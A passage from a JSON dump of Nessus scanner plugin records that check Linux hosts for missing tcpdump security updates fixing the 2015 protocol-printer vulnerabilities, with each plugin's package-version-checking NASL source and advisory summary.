DoS (CVE-2015-2155, bnc#922223)\n\n - ethernet printer remote DoS (CVE-2015-2154, bnc#922222)\n\n - tcp printer remote DoS (CVE-2015-2153, bnc#922221)", "modified": "2015-03-30T00:00:00", "published": "2015-03-30T00:00:00", "id": "OPENSUSE-2015-267.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82425", "title": "openSUSE Security Update : tcpdump (openSUSE-2015-267)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-267.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82425);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2015/03/30 13:59:01 $\");\n\n script_cve_id(\"CVE-2014-9140\", \"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\", \"CVE-2015-2155\");\n\n script_name(english:\"openSUSE Security Update : tcpdump (openSUSE-2015-267)\");\n script_summary(english:\"Check for the openSUSE-2015-267 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"tcpdump was updated to fix five vulnerabilities in protocol printers\n\nWhen running tcpdump, a remote unauthenticated user could have crashed\nthe application or, potentially, execute arbitrary code by injecting\ncrafted packages into the network.\n\nThe following vulnerabilities were fixed :\n\n - IPv6 mobility printer remote DoS (CVE-2015-0261,\n bnc#922220)\n\n - PPP printer remote DoS (CVE-2014-9140, bnc#923142)\n\n - force printer remote DoS (CVE-2015-2155, bnc#922223)\n\n - ethernet printer remote DoS (CVE-2015-2154, bnc#922222)\n\n - tcp printer remote DoS (CVE-2015-2153, bnc#922221)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=922220\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=922221\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=922222\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=922223\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=923142\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tcpdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tcpdump-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"tcpdump-4.4.0-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"tcpdump-debuginfo-4.4.0-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"tcpdump-debugsource-4.4.0-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"tcpdump-4.6.2-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"tcpdump-debuginfo-4.6.2-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"tcpdump-debugsource-4.6.2-8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump / tcpdump-debuginfo / tcpdump-debugsource\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:21:12", "bulletinFamily": "scanner", "description": "Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261,\nCVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2015-10-19T00:00:00", "published": "2015-03-31T00:00:00", "id": "FEDORA_2015-4939.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82445", "title": "Fedora 21 : tcpdump-4.7.3-1.fc21 (2015-4939)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4939.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82445);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:14:51 $\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\", \"CVE-2015-2155\");\n script_bugtraq_id(73017, 73018, 73019);\n script_xref(name:\"FEDORA\", value:\"2015-4939\");\n\n script_name(english:\"Fedora 21 : tcpdump-4.7.3-1.fc21 (2015-4939)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261,\nCVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201792\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201795\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201797\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153834.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fb71bc45\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"tcpdump-4.7.3-1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:21:12", "bulletinFamily": "scanner", "description": "Updated tcpdump package fixes security vulnerabilities :\n\nSeveral vulnerabilities have been discovered in tcpdump. These\nvulnerabilities might result in denial of service (application crash)\nor, potentially, execution of arbitrary code (CVE-2015-0261,\nCVE-2015-2153, CVE-2015-2154, CVE-2015-2155).", "modified": "2018-07-19T00:00:00", "published": "2015-03-31T00:00:00", "id": "MANDRIVA_MDVSA-2015-182.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82457", "title": "Mandriva Linux Security Advisory : tcpdump (MDVSA-2015:182)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:182. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82457);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/07/19 20:59:19\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\", \"CVE-2015-2155\");\n script_bugtraq_id(73017, 73018, 73019, 73021);\n script_xref(name:\"MDVSA\", value:\"2015:182\");\n\n script_name(english:\"Mandriva Linux Security Advisory : tcpdump (MDVSA-2015:182)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated tcpdump package fixes security vulnerabilities :\n\nSeveral vulnerabilities have been discovered in tcpdump. These\nvulnerabilities might result in denial of service (application crash)\nor, potentially, execution of arbitrary code (CVE-2015-0261,\nCVE-2015-2153, CVE-2015-2154, CVE-2015-2155).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2015-0114.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tcpdump-4.2.1-2.3.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:22:40", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201510-04\n(tcpdump: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in tcpdump. Please review\n the CVE identifiers referenced below for details.\nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, or cause a Denial of Service condition.\nWorkaround :\n\n There is no known workaround at this time.", "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "GENTOO_GLSA-201510-04.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=86689", "title": "GLSA-201510-04 : tcpdump: Multiple vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201510-04.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86689);\n script_version(\"$Revision: 2.1 $\");\n script_cvs_date(\"$Date: 2015/11/02 14:33:25 $\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\", \"CVE-2015-2155\");\n script_xref(name:\"GLSA\", value:\"201510-04\");\n\n script_name(english:\"GLSA-201510-04 : tcpdump: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201510-04\n(tcpdump: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in tcpdump. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, or cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201510-04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All tcpdump users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-analyzer/tcpdump-4.7.4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-analyzer/tcpdump\", unaffected:make_list(\"ge 4.7.4\"), vulnerable:make_list(\"lt 4.7.4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:21:24", "bulletinFamily": "scanner", "description": "It was discovered that tcpdump incorrectly handled printing certain\npackets. A remote attacker could use this issue to cause tcpdump to\ncrash, resulting in a denial of service, or possibly execute arbitrary\ncode.\n\nIn the default installation, attackers would be isolated by the\ntcpdump AppArmor profile.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2018-12-01T00:00:00", "published": "2015-04-28T00:00:00", "id": "UBUNTU_USN-2580-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83112", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : tcpdump vulnerabilities (USN-2580-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2580-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83112);\n script_version(\"2.7\");\n script_cvs_date(\"Date: 2018/12/01 15:12:39\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\", \"CVE-2015-2155\");\n script_bugtraq_id(73017, 73018, 73019, 73021);\n script_xref(name:\"USN\", value:\"2580-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : tcpdump vulnerabilities (USN-2580-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that tcpdump incorrectly handled printing certain\npackets. A remote attacker could use this issue to cause tcpdump to\ncrash, resulting in a denial of service, or possibly execute arbitrary\ncode.\n\nIn the default installation, attackers would be isolated by the\ntcpdump AppArmor profile.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2580-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(12\\.04|14\\.04|14\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 14.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"tcpdump\", pkgver:\"4.2.1-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"tcpdump\", pkgver:\"4.5.1-2ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"tcpdump\", pkgver:\"4.6.2-1ubuntu1.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:21:53", "bulletinFamily": "scanner", "description": "Integer signedness error in the mobility_opt_print function in the\nIPv6 mobility printer in tcpdump before 4.7.2 allows remote attackers\nto cause a denial of service (out-of-bounds read and crash) or\npossibly execute arbitrary code via a negative length value.\n(CVE-2015-0261)\n\nThe osi_print_cksum function in print-isoclns.c in the ethernet\nprinter in tcpdump before 4.7.2 allows remote attackers to cause a\ndenial of service (out-of-bounds read and crash) via a crafted (1)\nlength, (2) offset, or (3) base pointer checksum value.\n(CVE-2015-2154)", "modified": "2018-04-18T00:00:00", "published": "2015-07-08T00:00:00", "id": "ALA_ALAS-2015-557.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84593", "title": "Amazon Linux AMI : tcpdump (ALAS-2015-557)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-557.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84593);\n script_version(\"2.2\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2154\");\n script_xref(name:\"ALAS\", value:\"2015-557\");\n\n script_name(english:\"Amazon Linux AMI : tcpdump (ALAS-2015-557)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Integer signedness error in the mobility_opt_print function in the\nIPv6 mobility printer in tcpdump before 4.7.2 allows remote attackers\nto cause a denial of service (out-of-bounds read and crash) or\npossibly execute arbitrary code via a negative length value.\n(CVE-2015-0261)\n\nThe osi_print_cksum function in print-isoclns.c in the ethernet\nprinter in tcpdump before 4.7.2 allows remote attackers to cause a\ndenial of service (out-of-bounds read and crash) via a crafted (1)\nlength, (2) offset, or (3) base pointer checksum value.\n(CVE-2015-2154)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-557.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update tcpdump' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tcpdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) 